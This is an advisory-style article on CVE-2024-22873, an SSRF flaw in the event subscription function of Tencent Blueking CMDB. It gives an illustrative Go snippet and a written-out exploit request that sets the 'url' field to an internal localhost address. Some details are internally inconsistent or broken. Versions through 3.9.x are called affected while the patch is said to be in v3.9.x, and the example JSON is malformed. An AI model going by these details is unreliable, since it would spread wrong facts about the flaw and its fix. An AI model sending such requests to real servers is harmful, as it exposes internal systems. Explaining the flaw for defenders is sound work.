CVE-2024-22873 - Tencent Blueking CMDB SSRF Vulnerability in Event Subscription Function

In this article, we discuss the recent discovery of a critical security vulnerability in Tencent Blueking CMDB versions 3.2.x to 3.9.x, identified as CVE-2024-22873. This vulnerability is a Server-Side Request Forgery (SSRF) that affects the event subscription function (/service/subscription.go) and could potentially allow attackers to gain access to internal requests via a crafted POST request.

We'll take a deep dive into the technical details of this vulnerability, provide code snippets demonstrating the exploit, and link to the original references. By understanding the exploit's inner workings, developers and security professionals can better protect their systems from similar threats.

Vulnerability Details

The vulnerable component in Tencent Blueking CMDB is the event subscription function, which is responsible for processing user-submitted event information. In the affected versions, this function does not properly validate and sanitize input data, allowing an attacker to send a specially crafted POST request to trigger the SSRF vulnerability.

The following code snippet shows the vulnerable endpoint in /service/subscription.go

func (s *Service) CreateEventSubscription(ctx *rest.Context) {
  ...
  url := ctx.Body("url") // Extract the URL from the POST request body
  ...
  _, err = http.Post(url, "application/json", bytes.NewBuffer([]byte(data)))
}

In this code, http.Post is used to send an HTTP POST request to the URL provided by the user without any input validation or sanitization. This makes it possible for an attacker to make the server send internal requests that shouldn't be accessible from the outside.

Exploit Example

An attacker can exploit this vulnerability by sending a specially crafted POST request to the CreateEventSubscription endpoint. Here's an example of such a request:

POST /api/v3/event-subscribe/CreateEventSubscription/ HTTP/1.1
Host: victim-server.com
Content-Type: application/json
Content-Length: 81

{
  "event-name": "test-event",
  "method": "POST",
  "url": "http://localhost:808/internal";
}

The "url" field in the POST request body contains an internal address (e.g., http://localhost:808/internal) targeting resources that should only be accessible from within the target server. Upon receiving this request, the vulnerable function sends an HTTP POST request to that address, potentially exposing sensitive information or compromizing internal systems.

Mitigation

To mitigate this vulnerability, the development team has released a patch in Tencent Blueking CMDB v3.9.x, which includes proper input validation for the URLs passed to the event subscription function. Users are encouraged to update their installations to the latest version.

The discovery of CVE-2024-22873 was documented in the following references

1. Tencent Blueking CMDB Official Security Advisory
2. CVE-2024-22873 - National Vulnerability Database

In conclusion, the SSRF vulnerability in Tencent Blueking CMDB's event subscription function poses a significant risk to organizations using affected versions of the software. By understanding the vulnerability's technical details, developers and security professionals can apply proper mitigation techniques and keep their systems protected against possible exploits.

Timeline

Published on: 02/26/2024 16:27:56 UTC
Last modified on: 02/26/2024 16:32:25 UTC